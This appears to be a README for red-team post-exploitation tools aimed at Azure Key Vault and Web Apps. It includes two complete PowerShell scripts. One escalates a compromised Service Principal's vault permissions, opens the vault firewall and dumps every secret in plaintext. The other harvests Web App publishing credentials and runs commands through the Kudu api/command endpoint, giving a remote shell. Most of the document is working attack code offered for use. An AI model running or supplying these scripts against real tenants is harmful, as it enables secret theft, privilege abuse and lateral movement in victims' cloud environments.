Post-exploitation collection tools for enumerating and abusing Azure Web App and Azure Key Vault resources
These tools were developed to help IT administrators (not really...). They are developed for red teamers who have succeeded in finding a highly privileged Service Principal, one with high permissions on the ARM API.
You can use them:
- for data exfiltration with Vaulter.ps1
- for lateral movement with WebApp-Shell.ps1
- for enumeration of Web Apps with WebAppEnum.ps1
Vaulter.ps1 checks whether each Key Vault is managed by RBAC or by Access Policy, and abuses your identity's permissions to:
- add the "Key Vault Administrator" role to your identity (RBAC vaults), and add your IP address to the vault's network rules;
- add your identity's Object ID to the vault's access policies (Access Policy vaults), and add your IP address to the vault's network rules.
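The following is an added example, not the code of Vaulter.ps1, showing the decision described above against a single vault with the Az PowerShell modules (Az.Accounts, Az.Resources, Az.KeyVault). It assumes an active `Connect-AzAccount` session as the compromised Service Principal, that the vault name and your public IP are passed in (`$VaultName` and `$MyIp` are assumed parameters), and that the SP is allowed to resolve its own object ID through `Get-AzADServicePrincipal`.

```powershell
# Added example (not Vaulter.ps1 from this repo). Requires Az.Accounts, Az.Resources,
# Az.KeyVault and an existing Connect-AzAccount session as the compromised SP.
# $VaultName and $MyIp are assumptions supplied by the caller.
function Invoke-KeyVaultTakeover {
    param(
        [Parameter(Mandatory)][string]$VaultName,
        [Parameter(Mandatory)][string]$MyIp,                 # e.g. "203.0.113.10"
        [string]$OutFile = ".\kv_results.ndjson"
    )

    # For an SP login, Account.Id is the application (client) ID; the vault needs the
    # object ID of the service principal, so resolve it through Microsoft Graph.
    $appId = (Get-AzContext).Account.Id
    $me    = (Get-AzADServicePrincipal -ApplicationId $appId).Id

    $kv = Get-AzKeyVault -VaultName $VaultName

    # 1. Network rule: if the firewall default is Deny, admit our IP so the data plane answers us.
    if ($kv.NetworkAcls.DefaultAction -eq 'Deny') {
        Add-AzKeyVaultNetworkRule -VaultName $VaultName -IpAddressRange "$MyIp/32"
    }

    # 2. Authorization model decides which grant we need.
    if ($kv.EnableRbacAuthorization) {
        # RBAC vault: data-plane rights come from Azure roles assigned at the vault scope.
        New-AzRoleAssignment -ObjectId $me -RoleDefinitionName 'Key Vault Administrator' `
            -Scope $kv.ResourceId -ErrorAction SilentlyContinue | Out-Null
        $model = 'RBAC'
    } else {
        # Access-policy vault: add our object ID to the vault's access policies.
        Set-AzKeyVaultAccessPolicy -VaultName $VaultName -ObjectId $me `
            -PermissionsToSecrets get,list -PermissionsToKeys get,list -PermissionsToCertificates get,list
        $model = 'AccessPolicy'
    }

    # 3. Collect: one NDJSON line per enabled secret, so the file can be streamed into a report.
    foreach ($s in Get-AzKeyVaultSecret -VaultName $VaultName | Where-Object { $_.Enabled }) {
        $value = Get-AzKeyVaultSecret -VaultName $VaultName -Name $s.Name -AsPlainText
        [pscustomobject]@{
            vault = $VaultName
            model = $model
            name  = $s.Name
            value = $value
            time  = (Get-Date).ToString('o')
        } | ConvertTo-Json -Compress | Add-Content -Path $OutFile
    }
}

# Usage (vault name and IP are placeholders):
# Invoke-KeyVaultTakeover -VaultName 'target-kv' -MyIp '203.0.113.10'
```

Two practical caveats: the RBAC branch needs `Microsoft.Authorization/roleAssignments/write` on the vault (Owner or User Access Administrator), and a new role assignment can take a few minutes to propagate, so the first `Get-AzKeyVaultSecret` may still return 403; the access-policy branch needs `Microsoft.KeyVault/vaults/write`. If the SP has no Graph read permission, `Get-AzADServicePrincipal` fails and the object ID has to come from the `oid` claim of the SP's access token instead. Both the firewall rule and the grant are written to the Activity Log, so they are visible to defenders and should be reverted after collection.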
```powershell
Import-Module Vaulter.ps1
Vaulter
```

A file called `kv_results.ndjson` is created, and all collected data is written to it. When the run has finished, use Report-Builder.ps1 to create a beautiful report from your data:

```powershell
Import-Module Report-Builder.ps1
Report-Builder -InputFile .\kv_results.ndjson
```

WebApp-Shell.ps1 enumerates all Web Apps and tries to create an interactive shell on each one (using the Kudu/SCM `api/command` API):

```powershell
Import-Module WebApp-Shell.ps1
WebApp-Shell
```

WebAppEnum.ps1 enumerates all Web Apps, checks whether a `/.env` file exists with public access, and does some more fuzzing:

```powershell
Import-Module WebAppEnum.ps1
WebAppEnum
```

Use the `-Check` argument for full enumeration:

```powershell
WebAppEnum -Check
```

When it starts, the tool prompts for the Service Principal credentials:

```
Enter Service Principal Credentials:
```
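The following is an added example, not the code of WebAppEnum.ps1 or WebApp-Shell.ps1, that puts the two Web App steps described above into one sweep with the Az PowerShell modules (Az.Accounts, Az.Resources, Az.Websites): an unauthenticated probe for a public `/.env` (and a couple of other sensitive paths, a list constructed here for illustration), then the ARM-side retrieval of the app's publishing credentials and a command run through the Kudu `api/command` endpoint. It assumes an active `Connect-AzAccount` session as the compromised Service Principal; `$Command` and `$ProbePaths` are assumed parameters.

```powershell
# Added example (not WebAppEnum.ps1 / WebApp-Shell.ps1 from this repo). Requires
# Az.Accounts, Az.Resources, Az.Websites and a Connect-AzAccount session as the SP.
# $Command and $ProbePaths are assumptions; the probe list is constructed for illustration.
function Invoke-WebAppSweep {
    param(
        [string]$Command = 'whoami',
        [string[]]$ProbePaths = @('/.env', '/web.config', '/appsettings.json')
    )

    foreach ($app in Get-AzWebApp) {
        $fqdn   = $app.DefaultHostName            # e.g. myapp.azurewebsites.net
        $result = [ordered]@{ app = $app.Name; rg = $app.ResourceGroup; host = $fqdn; exposed = @(); shell = $null }

        # 1. Enumeration: unauthenticated GET for files that should never be web-reachable.
        #    Non-2xx responses throw in Invoke-WebRequest, so anything caught counts as not exposed.
        foreach ($p in $ProbePaths) {
            try {
                $r = Invoke-WebRequest -Uri "https://$fqdn$p" -UseBasicParsing -TimeoutSec 10 -ErrorAction Stop
                if ($r.StatusCode -eq 200) { $result.exposed += $p }
            } catch { }
        }

        # 2. Lateral movement: the ARM API "list" action on .../config/publishingcredentials
        #    returns the Kudu basic-auth user and password for the app...
        try {
            $creds = Invoke-AzResourceAction -ResourceGroupName $app.ResourceGroup `
                        -ResourceType 'Microsoft.Web/sites/config' `
                        -ResourceName "$($app.Name)/publishingcredentials" `
                        -Action list -ApiVersion '2022-03-01' -Force
            $pair  = "$($creds.Properties.publishingUserName):$($creds.Properties.publishingPassword)"
            $basic = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($pair))

            # ...and Kudu's POST /api/command runs a shell command inside the app's sandbox.
            # Windows and Linux apps have different wwwroot paths; Kind tells us which we have.
            $scm  = $fqdn -replace '\.azurewebsites\.net$', '.scm.azurewebsites.net'
            $dir  = if ($app.Kind -like '*linux*') { '/home/site/wwwroot' } else { 'site\wwwroot' }
            $body = @{ command = $Command; dir = $dir } | ConvertTo-Json
            $resp = Invoke-RestMethod -Uri "https://$scm/api/command" -Method Post `
                        -Headers @{ Authorization = "Basic $basic" } `
                        -ContentType 'application/json' -Body $body
            $result.shell = @{ exit = $resp.ExitCode; output = $resp.Output; error = $resp.Error }
        } catch {
            $result.shell = @{ error = $_.Exception.Message }
        }

        [pscustomobject]$result
    }
}

# Usage: one object per Web App, with the exposed paths and the command result.
# Invoke-WebAppSweep -Command 'whoami' | ConvertTo-Json -Depth 4
```

Reading the publishing credentials needs `Microsoft.Web/sites/config/list/action` on the app. The Kudu step fails when the app has basic-auth publishing disabled for the SCM site (`basicPublishingCredentialsPolicies/scm`) or when SCM IP restrictions block your source address, so an `error` in the `shell` field without any `output` usually means a hardened app rather than a broken request.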